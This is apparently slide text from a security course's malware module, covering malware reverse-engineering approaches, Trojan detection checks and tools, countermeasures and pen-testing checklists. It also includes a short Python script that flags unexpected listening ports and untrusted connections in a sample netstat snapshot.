• Trojan Analysis
  • NeverQuest
• Virus Analysis
  • Ransom Cryptolocker
• Worm Analysis
  • Darlloz


6.8 Malware Reverse Engineering


Approaches to Reverse Engineering Malware
• Reverse engineer
  • Use a hex dumper to look for bit patterns
  • Use a disassembler to read executable instructions in text format
• Examine the malware’s exploitation techniques
  • If the malware obfuscates itself, focus on reverse engineering only the new parts
  • Look for mistakes in ransomware encryption implementation
  • Look for command & control activity
• Categorization and clustering
  • Do broad stroke analysis on bulk samples rather than a deep dive into a single sample


Techniques
• Static analysis
  • Analyze binaries without actually running them
  • Look at file metadata, disassemble or decompile the executable
• Dynamic analysis
  • Run the executable in a sandboxed environment
• Automated analysis
  • Use automated tools
  • Be careful that they don’t miss anything!
• Manual analysis
  • Use if the malware contains anti-debugging routines or anti-analysis mechanisms


Malware Analysis Tools
• Knowledge of Assembly language
• Disassembler – IDA Pro
• Debugger – OllyDbg, WinDbg
• System Monitor – Process Monitor, Regshot, Process Explorer
• Network Monitor – TCPView, Wireshark
• Packer Identifier – PEiD
• Unpacking Tools – Qunpack, GUNPacker
• Binary Analysis Tools – PE Explorer, Malcode Analysts Pack
• Code Analysis Tools – LordPE, ImpRec


IDA Pro Example


6.9 Malware Detection


How to Detect Trojans
• Scan for open ports that are suspicious
• Scan for startup programs that are suspicious
• Scan for running processes that are suspicious
• Scan for files/folders that are suspicious
• Scan for network activities that are suspicious
• Scan for registry entries that are suspicious
• Scan for device drivers that are suspicious
• Scan for O/S files that have been suspiciously modified
• Scan for Windows services that are suspicious
• Run a Trojan scanner


Scanning for Suspicious Ports
• Trojans open ports that are unused and connect to Trojan handlers
• Watch for connections to unknown/suspicious IP addresses
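The two checks on this slide run over a snapshot in the shape of Windows `netstat -ano` output, as an added example that is not course material: flag listeners outside a known-good baseline and established sessions to addresses outside the networks you own. The snapshot, the expected-listener set and the trusted ranges are all constructed for the example; build yours from a known-clean image.

```python
import ipaddress

# Constructed snapshot in the shape of Windows `netstat -ano` output.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING       4412
  TCP    10.0.0.5:49712         203.0.113.77:6667      ESTABLISHED     4412
  TCP    10.0.0.5:49713         10.0.0.20:443          ESTABLISHED     2208
  UDP    0.0.0.0:137            *:*                                    4
"""

# Baseline for this host (constructed): listeners you expect, ranges you own.
EXPECTED_LISTENERS = {135, 139, 445, 3389}
TRUSTED_NETWORKS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "127.0.0.0/8")]


def split_endpoint(endpoint: str):
    """'10.0.0.5:49712' -> ('10.0.0.5', 49712); '*:*' -> ('*', None)."""
    host, _, port = endpoint.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def parse_netstat(text: str) -> list:
    """Turn netstat -ano rows into dicts; UDP rows carry no State column."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0] not in ("TCP", "UDP"):
            continue  # header or blank line
        state = fields[3] if fields[0] == "TCP" else ""
        rows.append({"proto": fields[0], "local": fields[1],
                     "remote": fields[2], "state": state, "pid": int(fields[-1])})
    return rows


def find_suspicious(rows: list) -> list:
    """Flag unexpected listening ports and sessions to untrusted addresses."""
    findings = []
    for r in rows:
        _, lport = split_endpoint(r["local"])
        rhost, rport = split_endpoint(r["remote"])
        if r["state"] == "LISTENING" and lport not in EXPECTED_LISTENERS:
            findings.append(("unexpected-listener", lport, r["pid"]))
        elif r["state"] == "ESTABLISHED":
            addr = ipaddress.ip_address(rhost)
            if not any(addr in net for net in TRUSTED_NETWORKS):
                findings.append(("untrusted-remote", f"{rhost}:{rport}", r["pid"]))
    return findings
```

The PID in each finding is what you carry into Process Explorer or TCPView next; here both findings point at the same process, which is the pattern the slide describes.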


Ports Monitoring Tools
• TCPView
• CurrPorts


Scanning for Suspicious Services
• Trojans make themselves look like valid Windows services or hide their processes
• Some Trojans use PEs to inject into processes
• Processes look legitimate and help bypass firewalls
• Trojans can hide processes using rootkit methods
• Process monitoring tools can be used to identify hidden backdoors/Trojans


Services Monitoring Tools
• Process Explorer
• System Explorer
• HijackThis
• Autoruns for Windows
• KillProcess
• Security Task Manager
• Yet Another (remote) Process Monitor
• MONIT
• ESET SysInspector
• OpManager


HijackThis Example


Scanning for Suspicious Registry Entries
• Windows automatically executes instructions in certain registry sections
• Suspicious entries found when conducting a registry scan might be a Trojan infection
• Trojans inject instructions into certain registry sections to execute malicious actions


Registry Entries Monitoring Tools
• RegScanner
• Reg Organizer
• Registry Viewer
• Comodo Cloud Scanner
• Buster Sandbox Analyzer
• All-Seeing Eyes
• MJ Registry Watcher
• Active Registry Monitor
• Regshot
• Registry Live Watch
• Alien Registry Viewer


Scanning for Suspicious Device Drivers
• Trojans end up installed along with device drivers from unknown/untrusted sources
• The drivers are used to avoid detection
• Scan all drivers to ensure they are trusted/genuine


Device Drivers Monitoring Tools
• DriverView
• Driver Detective
• Unknown Device Identifier
• DriverGuide Toolkit
• InstalledDriversList
• Driver Magician
• Driver Reviver
• ServiWin
• Double Driver
• My Drivers
• DriverEasy


Scanning for Suspicious Windows Services
• Trojans that spawn Windows services allow attackers to control the virtual machine/send malicious instructions remotely
• Trojans rename all malicious processes to look genuine
• Trojans use rootkit techniques to manipulate certain registry keys to hide processes


Windows Services Monitoring Tools
• Windows Service Manager (SrvMan)
• SMART Utility
• Netwrix Service Monitor
• PC Services Optimizer
• ServiWin
• Windows Service Manager Tray
• AnVir Task Manager
• Process Hacker
• Free Windows Service Monitor Tool
• Nagios XI
• Service+


Scanning for Suspicious Startup Programs
• Check the registry for startup program entries
• Check locally automated device drivers
• Check boot.ini
• Check automatically started Windows services
• Check the startup folder


Suspicious Startup Program Tools
• Security AutoRun
• Autoruns for Windows
• ActiveStartup
• StartEd Pro
• Startup Delayer
• Startup Manager
• PCTuneUp Free Startup Manager
• Disable Startup
• WinPatrol
• Chameleon Startup Manager
• Startup Booster


Scanning for Suspicious Files and Folders
• Trojans generally modify the files/folders of a system
• Tools to identify changes in the system include:
  • SIGVERIF
  • FCIV
  • TRIPWIRE


File and Folder Integrity Checkers
• FastSum
• WinMD5
• Advanced CheckSum Verifier (ACSV)
• Fsum Frontend
• Verisys
• Another File Integrity Checker (AFICK)
• FileVerifier++
• PA File Sight
• CSP File Integrity Checker
• ExactFile
• OSSEC
• Checksum Verifier


Scanning for Suspicious Network Activities
• Trojans send sensitive information to attackers by connecting back to the handler
• Network scanners/packet sniffers can monitor traffic to a malicious remote address
• Tools like Capsa can monitor traffic for suspicious activity via the web
• Capsa is a network analyzer that gives detailed information on potential Trojan activities


6.10 Malware Countermeasures


Trojan Countermeasures
• Do not open email attachments from unknown senders
• Ensure patches/security updates are installed
• Ensure unnecessary ports at the host firewall are blocked
• Conduct an antivirus scan of all DVDs/CDs
• Do not accept programs via IM
• Ensure desktop permissions are restricted


Trojan Countermeasures (cont’d)
• Ensure weak default configuration settings are hardened and unused functions are disabled
• Do not blindly type commands or use pre-made scripts/programs
• Ensure internal traffic is monitored for encrypted traffic/unusual ports
• Ensure the file integrity of each workstation is consistently managed
• Do not download/execute apps from untrusted sources
• Regularly run host-based anti-virus, intrusion detection, and firewall software


Backdoor Countermeasures
• The majority of commercial antivirus software can scan for/detect backdoor programs
• Ensure users know not to install apps from untrusted sources
• Ensure use of anti-virus tools to identify/eliminate backdoor programs


Virus and Worms Countermeasures
• Ensure installation of anti-virus software that identifies/eliminates infections as soon as they appear
• Follow all instructions when downloading programs/files from the Internet
• Ensure an anti-virus policy is in place and all staff have it
• Do not open attachments from unknown senders
• Ensure anti-virus software is regularly updated
• Ensure regular scans of all drives are conducted
• Ensure regular backup of data
• Check all programs/disks with updated anti-virus before using


Virus and Worms Countermeasures (cont’d)
• Ensure approval of all executable code received by the organization
• Ensure disk cleanup, defragmentation, and registry scanner are run weekly
• Avoid booting the machine with an infected boot disk
• Ensure the firewall is on when using O/S in Windows XP
• Keep updated on the latest virus threats
• Ensure anti-spyware/adware is run weekly
• Ensure all CDs/DVDs are checked for infection
• Avoid opening files that have multiple types of file extensions
• Turn on popup blocker and use an Internet firewall
• Take extra care with files received via IM


Anti-Trojan Software
• TrojanHunter
• Emsisoft Anti-Malware
• Anti Malware BOClean
• Anti Hacker
• XoftSpySE
• SPYWAREfighter
• Malwarebytes Anti-Malware Premium
• SUPERAntiSpyware
• Trojan Remover
• Twister Antivirus
• STOPzilla AntiMalware
• ZeroSpyware


Antivirus Tools
• Immunet
• AVG Antivirus
• BitDefender
• Kaspersky Anti-Virus
• Trend Micro Titanium Maximum Security
• Norton AntiVirus
• F-Secure Anti-Virus
• avast! Pro Antivirus 2014
• McAfee AntiVirus Plus 2014
• ESET Smart Security 7
• Total Defense Internet Security Suite


6.11 Malware Penetration Testing


Pen Testing for Trojans and Backdoors
• Scanning for open ports
• Scanning for processes that are running
• Scanning for entries in the registry
• Scanning for installation of device drivers
• Scanning for Windows services
• Scanning for startup programs
• Scanning for files/folders
• Scanning for activities on the network
• Scanning for O/S file modification
• Running a Trojan scanner
• Documenting findings


Pen Testing for Trojans and Backdoors (cont’d)
• When a Trojan is found:
  • Isolating the machine from the network
  • Updating and running anti-virus, or using another anti-virus program


Pen Testing for Viruses
• Testing for suspicious behavior in a system
  • Is anti-virus installed?
  • Is anti-virus updated?
  • Is real-time scanning enabled?
• Scanning for running processes
• Scanning for changes to registry entries
• Checking Windows services
• Checking startup programs
• Checking integrity of files/folders
• Checking modification of O/S files


Pen Testing for Viruses (cont’d)
• When suspicious activity is found:
  • Ensuring system isolation
  • Running anti-virus in safe mode
• When a virus is found:
  • Installing a different anti-virus program
  • Scanning a second time for system viruses
• When a virus is found:
  • Formatting the system with a clean copy of the O/S
  • Documenting findings


Malware Threats Review
• Malware is malicious software that disables/damages computer systems
• A Trojan is a program that hides malicious code inside seemingly normal data/programming
• A Trojan executable is bound to .EXE apps using a wrapper
• An exploit/crimeware kit delivers exploits/payload to a target system
• A virus is a self-replicating program
• A worm is a more advanced type of virus that does not need to be attached to another file
• Viruses are categorized based on what/how they infect
• The best defense against Trojans/viruses is awareness/prevention
• Use anti-Trojan/anti-virus tools to identify/eliminate Trojans/viruses


Lab 6: Malware Threats